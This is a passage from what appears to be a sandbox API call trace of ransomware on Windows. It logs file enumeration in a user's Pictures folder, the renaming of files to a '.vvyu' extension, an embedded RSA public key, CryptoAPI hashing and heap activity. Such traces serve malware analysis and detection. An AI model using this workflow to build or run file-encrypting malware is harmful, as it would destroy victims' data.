hHeap=0x2c0000) returned 1 [0190.179] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ed40 | out: hHeap=0x2c0000) returned 1 [0190.179] WriteFile (in: hFile=0x584, lpBuffer=0x2af43b8*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2af43b8*, lpNumberOfBytesWritten=0x2f9fb50*=0x28, lpOverlapped=0x0) returned 1 [0190.179] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af43b8 | out: hHeap=0x2c0000) returned 1 [0190.179] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0190.179] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x2f9fb50*=0x26, lpOverlapped=0x0) returned 1 [0190.179] CloseHandle (hObject=0x584) returned 1 [0190.180] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40108 [0190.180] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x2af3f88 [0190.181] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40108 | out: hHeap=0x2c0000) returned 1 [0190.181] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Pictures\\3UVY.jpg" (normalized: "c:\\users\\keecfmwgj\\pictures\\3uvy.jpg"), lpNewFileName="C:\\Users\\kEecfMwgj\\Pictures\\3UVY.jpg.vvyu" (normalized: "c:\\users\\keecfmwgj\\pictures\\3uvy.jpg.vvyu")) returned 1 [0190.182] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0190.182] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0190.182] VirtualFree (lpAddress=0x2620000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0190.185] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ee78 | out: hHeap=0x2c0000) returned 1 [0190.185] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x50410370, ftCreationTime.dwHighDateTime=0x1d89d42, ftLastAccessTime.dwLowDateTime=0xc5b768e0, ftLastAccessTime.dwHighDateTime=0x1d8a622, ftLastWriteTime.dwLowDateTime=0xc5b768e0, ftLastWriteTime.dwHighDateTime=0x1d8a622, nFileSizeHigh=0x0, nFileSizeLow=0x15bb2, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="5KliNx-drvR8.bmp", cAlternateFileName="5KLINX~1.BMP")) returned 1 [0190.185] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af2fe8 [0190.185] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ee78 [0190.185] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af2fe8 | out: hHeap=0x2c0000) returned 1 [0190.185] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Pictures\\5KliNx-drvR8.bmp") returned=".bmp" [0190.185] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Pictures\\5KliNx-drvR8.bmp" (normalized: "c:\\users\\keecfmwgj\\pictures\\5klinx-drvr8.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0190.187] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x2f9fb40 | out: lpFileSize=0x2f9fb40*=89010) returned 1 [0190.187] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2620000 [0190.190] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x15b8c, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0190.190] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x2f9fb78, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb78*=0x26, lpOverlapped=0x0) returned 1 [0190.191] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425b8 [0190.192] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0190.192] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0190.192] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x2f9fb70, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb70*=0x15bb2, lpOverlapped=0x0) returned 1 [0190.193] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0190.193] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f1) returned 0x2a7d6f0 [0190.193] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0190.193] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0190.193] CryptAcquireContextW (in: phProv=0x2f9fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2f9fa50*=0x31b9f8) returned 1 [0190.194] CryptCreateHash (in: hProv=0x31b9f8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2f9fa58 | out: phHash=0x2f9fa58) returned 1 [0190.194] CryptHashData (hHash=0x2a05de8, pbData=0x2a7d6f0, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0190.194] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x0, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x2f9fa54) returned 1 [0190.194] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11) returned 0x2a26b08 [0190.194] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x2a26b08, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x2a26b08, pdwDataLen=0x2f9fa54) returned 1 [0190.194] GetLastError () returned 0x0 [0190.194] CryptDestroyHash (hHash=0x2a05de8) returned 1 [0190.194] CryptReleaseContext (hProv=0x31b9f8, dwFlags=0x0) returned 1 [0190.195] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0190.195] UuidCreate (in: Uuid=0x2f9fa48 | out: Uuid=0x2f9fa48) returned 0x0 [0190.195] UuidToStringA (in: Uuid=0x2f9fa48, StringUuid=0x2f9fa40 | out: StringUuid=0x2f9fa40) returned 0x0 [0190.195] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0190.195] RpcStringFreeA (in: String=0x2f9fa40 | out: String=0x2f9fa40) returned 0x0 [0190.195] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0190.195] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425b8 [0190.195] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x15bb0) returned 0x2af5168 [0190.196] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0190.196] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0190.196] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2adfa00 [0190.196] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0190.196] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2a7d6f0 [0190.196] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9ed0 [0190.196] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af2fe8 [0190.196] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0dbe0 [0190.196] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af3030 [0190.196] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0dbf8 [0190.196] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0dc28 [0190.196] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0dc88 [0190.196] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0dc40 [0190.196] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x24) returned 0x2a06f58 [0190.196] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x158) returned 0x2aebfa0 [0190.196] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x2aebfa0, Size=0x218) returned 0x2aee1c8 [0190.197] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x2af3f88 [0190.197] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0dc28 | out: hHeap=0x2c0000) returned 1 [0190.197] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0dc40 | out: hHeap=0x2c0000) returned 1 [0190.197] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0dc88 | out: hHeap=0x2c0000) returned 1 [0190.197] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a06f58 | out: hHeap=0x2c0000) returned 1 [0190.197] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0190.197] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0dc88 [0190.197] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7dc0 [0190.197] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2a0dc40 [0190.197] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ac8 [0190.198] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x9) returned 0x2a0dc28 [0190.198] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e40 [0190.198] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10e) returned 0x2f5b18 [0190.198] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ba8 [0190.198] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9f30 [0190.198] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26b08 [0190.198] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x104) returned 0x2a19588 [0190.198] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26ae8 [0190.198] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e30 [0190.199] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0190.199] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0dc40 | out: hHeap=0x2c0000) returned 1 [0190.199] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0190.199] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0dc28 | out: hHeap=0x2c0000) returned 1 [0190.199] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ac8 | out: hHeap=0x2c0000) returned 1 [0190.199] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7dc0 | out: hHeap=0x2c0000) returned 1 [0190.199] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0dc88 | out: hHeap=0x2c0000) returned 1 [0190.199] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ba8 | out: hHeap=0x2c0000) returned 1 [0190.200] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9ed0 | out: hHeap=0x2c0000) returned 1 [0190.200] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aee1c8 | out: hHeap=0x2c0000) returned 1 [0190.200] GetCurrentThreadId () returned 0x5d8 [0190.200] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae00c8 [0190.200] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x82) returned 0x2ae4a88 [0190.200] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2c) returned 0x2a42698 [0190.200] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b9f8 [0190.200] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x148) returned 0x2ae2eb8 [0190.200] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7dc0 [0190.200] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e40 [0190.200] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae01d0 [0190.200] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0190.201] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0190.201] GetCurrentThreadId () returned 0x5d8 [0190.201] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0190.201] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0190.201] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xeb) returned 0x2f5b18 [0190.201] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0190.201] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0190.201] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0190.202] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0190.202] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0190.202] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae03e0 [0190.202] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7dc0 | out: hHeap=0x2c0000) returned 1 [0190.202] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4c) returned 0x2a40108 [0190.202] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7dc0 [0190.202] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2adffc0 [0190.202] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e50 [0190.202] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0dc88 [0190.203] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0190.203] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e50 [0190.203] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e20 [0190.203] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e00 [0190.203] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e10 [0190.203] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7db0 [0190.203] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7da0 [0190.203] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7de0 [0190.203] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0dc28 [0190.203] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e20 | out: hHeap=0x2c0000) returned 1 [0190.203] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e20 [0190.203] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0190.203] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e50 [0190.203] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e80 [0190.203] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e60 [0190.203] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e70 [0190.203] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2a0dc40 [0190.203] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e60 | out: hHeap=0x2c0000) returned 1 [0190.203] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ac8 [0190.203] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e80 | out: hHeap=0x2c0000) returned 1 [0190.203] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0dc10 [0190.203] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e70 | out: hHeap=0x2c0000) returned 1 [0190.203] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2a0dca0 [0190.203] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0190.203] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e50 [0190.204] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0190.204] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0dc70 [0190.204] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0190.204] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0dc58 [0190.204] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e00 | out: hHeap=0x2c0000) returned 1 [0190.204] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2a0dcb8 [0190.204] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0dc58 | out: hHeap=0x2c0000) returned 1 [0190.204] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2a0dc58 [0190.204] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0dc70 | out: hHeap=0x2c0000) returned 1 [0190.204] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e00 [0190.204] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7dc0 | out: hHeap=0x2c0000) returned 1 [0190.204] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26aa8 [0190.204] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e00 | out: hHeap=0x2c0000) returned 1 [0190.204] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1c) returned 0x2ad7ba8 [0190.204] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0dc28 | out: hHeap=0x2c0000) returned 1 [0190.204] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2a0dc28 [0190.204] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e20 | out: hHeap=0x2c0000) returned 1 [0190.204] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x204) returned 0x2af3f88 [0190.204] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0dc88 | out: hHeap=0x2c0000) returned 1 [0190.204] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a197b8 [0190.204] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0dcb8 | out: hHeap=0x2c0000) returned 1 [0190.204] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x210) returned 0x2af4198 [0190.204] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ba8 | out: hHeap=0x2c0000) returned 1 [0190.205] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10c) returned 0x2f5b18 [0190.205] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e10 | out: hHeap=0x2c0000) returned 1 [0190.205] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a198d0 [0190.205] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0dc28 | out: hHeap=0x2c0000) returned 1 [0190.205] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x200) returned 0x2af43b0 [0190.205] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a197b8 | out: hHeap=0x2c0000) returned 1 [0190.205] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae04e8 [0190.205] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0190.206] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9f8 | out: hHeap=0x2c0000) returned 1 [0190.206] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae03e0 | out: hHeap=0x2c0000) returned 1 [0190.206] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae04e8 | out: hHeap=0x2c0000) returned 1 [0190.206] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26aa8 | out: hHeap=0x2c0000) returned 1 [0190.207] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a198d0 | out: hHeap=0x2c0000) returned 1 [0190.207] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af4198 | out: hHeap=0x2c0000) returned 1 [0190.207] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af43b0 | out: hHeap=0x2c0000) returned 1 [0190.208] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0190.208] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7db0 | out: hHeap=0x2c0000) returned 1 [0190.208] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0dc58 | out: hHeap=0x2c0000) returned 1 [0190.208] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0190.208] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0dca0 | out: hHeap=0x2c0000) returned 1 [0190.208] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ac8 | out: hHeap=0x2c0000) returned 1 [0190.208] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0dc40 | out: hHeap=0x2c0000) returned 1 [0190.208] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0dc10 | out: hHeap=0x2c0000) returned 1 [0190.208] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2eb8 | out: hHeap=0x2c0000) returned 1 [0190.209] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0190.209] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae01d0 | out: hHeap=0x2c0000) returned 1 [0190.209] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0dbf8 | out: hHeap=0x2c0000) returned 1 [0190.210] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3030 | out: hHeap=0x2c0000) returned 1 [0190.210] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0190.211] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adffc0 | out: hHeap=0x2c0000) returned 1 [0190.211] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40108 | out: hHeap=0x2c0000) returned 1 [0190.211] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a19588 | out: hHeap=0x2c0000) returned 1 [0190.211] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26b08 | out: hHeap=0x2c0000) returned 1 [0190.211] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e30 | out: 